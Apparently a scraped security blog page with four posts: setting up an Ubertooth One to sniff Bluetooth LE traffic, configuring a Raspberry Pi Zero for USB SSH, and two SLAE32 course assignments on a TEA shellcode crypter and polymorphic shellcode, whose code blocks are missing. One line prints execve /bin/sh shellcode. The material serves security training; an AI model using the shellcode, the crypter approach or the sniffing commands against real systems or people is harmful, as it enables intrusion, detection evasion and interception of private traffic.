Setting up Ubertooth One – Kali

Install essential packages and updates
Login to Kali as root/toor
apt-get update
apt-get install kali-linux-sdr
apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev pkg-config libpcap-dev python-numpy python-pyside python-qt4 libgtk2.0-dev libusb-dev bluez

Install the Bluetooth baseband decoding library
wget https://github.com/greatscottgadgets/libbtbb/archive/2015-10-R1.tar.gz -O libbtbb-2015-10-R1.tar.gz
tar xf libbtbb-2015-10-R1.tar.gz
cd libbtbb-2015-10-R1
mkdir build
cd build
cmake ..
make
make install
ldconfig

Install Ubertooth tools
wget https://github.com/greatscottgadgets/ubertooth/releases/download/2015-10-R1/ubertooth-2015-10-R1.tar.xz -O ubertooth-2015-10-R1.tar.xz
tar xf ubertooth-2015-10-R1.tar.xz
cd ubertooth-2015-10-R1/host
mkdir build
cd build
cmake ..
make
make install
ldconfig

Visualizing the 2.4 GHz spectrum
git clone https://www.kismetwireless.net/spectools.git
cd spectools
./configure
make
make install
spectool_gtk

The last command will open up WiSPY, click on the “Open Device”, select “Ubertooth One USB”, click on Enable, if you don’t see anything anything on the three Views (Spectral, Topo, Planar) try physically disconnecting and reconnecting Ubertooth-One.

Activity is In-Progress – File is downloading.

Activity is done – File download is completed.

Determine the installed firmware version
#ubertooth-util -V
ubertooth 2015-10-R1 (dominicgs@hydrogen) Mon Oct 12 22:30:57 BST 2015

Known Limitations
The BLE sniffer can only scan 1 Advertisement Channel at a time, out of the 3 (channel 37 on 2402 MHz, channel 38 on 2426 MHz and channel 39 on 2480 MHz). This is a hardware limitation since the Ubertooth has only one narrowband radio chip (the CC2400) and can only tune to a single frequency at a time. So when sniffing the BLE Advertisement channels you have 33.3% chances being on the correct channel for a specific connection. The solution to this issue is to keep trying until you get lucky enough to be on the right channel at the right time, or get 3 Ubertooth dongles each one tuned to monitoring 1 of the Advertisement Channels.

Sniff Bluetooth LE Packets
1. Using the default linux Bluetooth utilities: # /etc/init.d/bluetooth restart && hcitool dev && hcitool scan
2. Using the ubertooth-scan from Ubertooth utilities: # ubertooth-scan -b hcil -t 40 -x
3. Using the ubertooth-btle from Ubertooth utilities (capture Bluetooth LE (Low Energy)) in promiscuous mode:
# ubertooth-btle -p
Sample output:
systime=1481409606 freq=2440 addr=f605c0cd delta_t=24.492 ms
61 bc ed 3c 9e 14 c7 f9 17 3e 44 7d 83 8f 9d 38 2f f8 e5 7d 68 13 a5 42 db ce 67 54 c6 7b c9 d2 67 df 98 40 d1 e4 02 db 18 4c 52 6f c8 0d
Data / AA f605c0cd (valid) / 28 bytes
Channel Index: 17
LLID: 1 / LL Data PDU / empty or L2CAP continuation
NESN: 0 SN: 0 MD: 0

Data: ed 3c 9e 14 c7 f9 17 3e 44 7d 83 8f 9d 38 2f f8 e5 7d 68 13 a5 42 db ce 67 54 c6 7b
CRC: c9 d2 67

4. Using the ubertooth-btle again, but this time save the traffic in a PCAP file for post-examination:
# ubertooth-btle -p -c /tmp/capture.pcap

5. Using the ubertooth-btle again, observe in realtime (you have 1 in 3 chances of being on the correct advertising channel, due to the Known Limitation described earlier):
# mkfifo /tmp/fifopipe0
# ubertooth-btle -f -c /tmp/fifopipe0 &

Open Wireshark |  click Capture | Options | click “Manage Interfaces” button on the right side of the window | click the “New” button | in the “Pipe” text box, type “/tmp/fifopipe0” | click Save | click Close | click “Start”

or, launch Wireshark from command line as:
# wireshark -k -i /tmp/fifopipe0 &

6. In case you have 3 Ubertooth devices you can overcome the limitation, described in “Known Limitation” section and monitor all 3 Advertisement channels:

# mkfifo /tmp/fifopipe0 && mkfifo /tmp/fifopipe1 && mkfifo /tmp/fifopipe2
# ubertooth-btle -U0 -A37 -f -c /tmp/fifopipe0 &
# ubertooth-btle -U1 -A38 -f -c /tmp/fifopipe1 &
# ubertooth-btle -U2 -A39 -f -c /tmp/fifopipe2 &

then, either launch Wireshark from command line as:
# wireshark -k -i /tmp/fifopipe0 -i /tmp/fifopipe1 -i /tmp/fifopipe2 &

or,
Open Wireshark |  click Capture | Options | click “Manage Interfaces” button on the right side of the window | click the “New” button | in the “Pipe” text box, type “/tmp/fifopipe0”, repeat for “/tmp/fifopipe1” and “/tmp/fifopipe2” | click Save | click Close | click “Start”

Viewing Bluetooth Packets in Wireshark
# wireshark /tmp/capture.pcap
go to Edit | Preferences | Protocols | select DTL_USER and click on Edit… | click on “+” to add | Ensure the new value reads “User 0 (DLT=147)” | in the “Payload protocol” column enter “btle”| OK | OK

Useful Wireshark filters
1. Connection requests and non-zero data packets:
btle.data_header.length > 0 || btle.advertising_header.pdu_type == 0x05

2. Ignore empty PDU (Keep-alive packet):
not btle.data_header.llid==0001

Facebooktwittergoogle_plusredditpinterestlinkedinmailby feather

Raspberry Pi Zero OTG – MacOSX

Download

  1. Raspbian as of 10/Dec/2016 this will download you Raspbian Jessie with Pixel (Pi Improved X-windows Environment, Lightweight) desktop
  2. Etcher v1 for Darwin x64 to flash Raspbian into the SD card. Visit main site for more info
  3. SDFormatter to format the SD card

Configuring Raspberry Pi Zero to Emulate Ethernet Over USB

Once you flash the Raspbian image onto the SD card then:

  1. Open a file at the root of the mounted drive called config.txt
  2. Add the following line at the very bottom: dtoverlay=dwc2
  3. Open a file at the root of the mounted drive called cmdline.txt
  4. Add the following line after the rootwait parameter: modules-load=dwc2,g_ether
  5. Create a file called ssh in to the root of the mounted driver, the file can contain any text you like, or even nothing at all: touch /Volumes/boot/ssh

Note: SSH will be disabled by default on the images from version 1.1 (2016-11-25-raspbian-jessie, Raspberry Pi reference 2016-11-25). When the Pi boots, it looks for the ssh file; if it finds it, it enables SSH and then deletes the file.

Connecting to the Pi Zero with USB and SSH on MACOSX

  1. Connect the USB cable to your MAC and the other end to the USB-micro port. Raspberry Pi Zero comes with 2 USB micro ports, the one towards the side of the Raspberry is dedicated for the Power Supply, the other one is for Data.
  2. Try pinging raspberrypi.local as: ping raspberrypi.local
  3. If you can reach the host then ssh: ssh pi@raspberrypi.local
  4. The password for user pi is raspberry
  5. If ping fails and you are getting “Request timeout”
  6. Then try the following, in your MAC, open “System Preferences” | “Sharing” | “Internet Sharing” enable | “To computers using” section enable “RNDIS/Ethernet Gadget”
  7. sharingDisconnect/reconnect the USB cable
  8. Now you should be able to ping and ssh

If you still cannot connect to your Raspberry Pi Zero, try the following:

  1. Try turning off Networking / WiFi
  2. Replaced the USB to microUSB cable
  3. Ensure Internet Sharing is enabled for “RNDIS/Ethernet Gadget”
  4. Install HoRNDIS (pronounce: “horrendous”) driver for Mac OS X, this allows you to use your Android phone’s native USB tethering mode to get Internet access.
Facebooktwittergoogle_plusredditpinterestlinkedinmailby feather

SLAE32 Assignment 7 – Custom Crypter

Note: All related code can be found at My Github Repository.

Task:
– Create one program to encrypt the shellcode
– Create another program to decrypt and execute it

For this task we picked up the (TEA) Tiny Encryption Algorithm. It is a block cipher notable for its simplicity of description and implementation, designed by David Wheeler and Roger Needham of the Cambridge Computer Laboratory.

As input we are using the shellcode (\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80) as extracted from the execve-stack file, which simply spawns a /bin/sh shell.

Take the execve.nasm file

Compile and link the execve.nasm:

Use objdump to get the opcodes for execve.nasm

Of course, we could easily complicate the shellcode further, eg:
1. Use the XOREncoder.py with the opcodes from execve.nasm
2. Run “python XOREncoder.py” take the output 0x…
3. Update xor-decoder.nasm using the output from “python XOREncoder.py”
4. Compile and link the updated xor-decoder.nasm
5. Use objdump to get the opcodes from the compiled/linked xor-decoder
6. Feed our TEA-Encypter with code with opcodes from xor-decoder

TEA Encryptor

Compile and run

TEA DeCrypter & Executor

Compile and run

#####
This post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE- 461
#####

Facebooktwittergoogle_plusredditpinterestlinkedinmailby feather

SLAE32 Assignment 6 – Polymorphic Shellcode III

Note: All related code can be found at My Github Repository.

Task:
– Create a new version (polymorphic) of an existing shellcode taken from www.shell-storm.org
– Newer version of shellcode should not be more than 150% of the original code

Copy code from http://shell-storm.org/shellcode/files/shellcode-213.php

Add in line 35, the following: printf("Shellcode Length: %d\n", strlen(shellcode));
Add in the following at the top of the program:

Compile with the highlighted changes and run:

Let’s put the code in an assembly skeleton program and transform to the Intel syntax:

Assemble:

Link:

Run to test it is working:

Now let’s attempt to change a few bits in the code, deleted code is prefixed/enclosed with ; or ;-----------:

Compile and run:

Do a quick disassembling:

Extract the shellcode:

Now copy the shellcode into your C shellcode skeleton program (213.v1.in.c.program.c), as:

Compile and run again:

Bonus proggie to play with stime function:

#####
This post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE- 461
#####

Facebooktwittergoogle_plusredditpinterestlinkedinmailby feather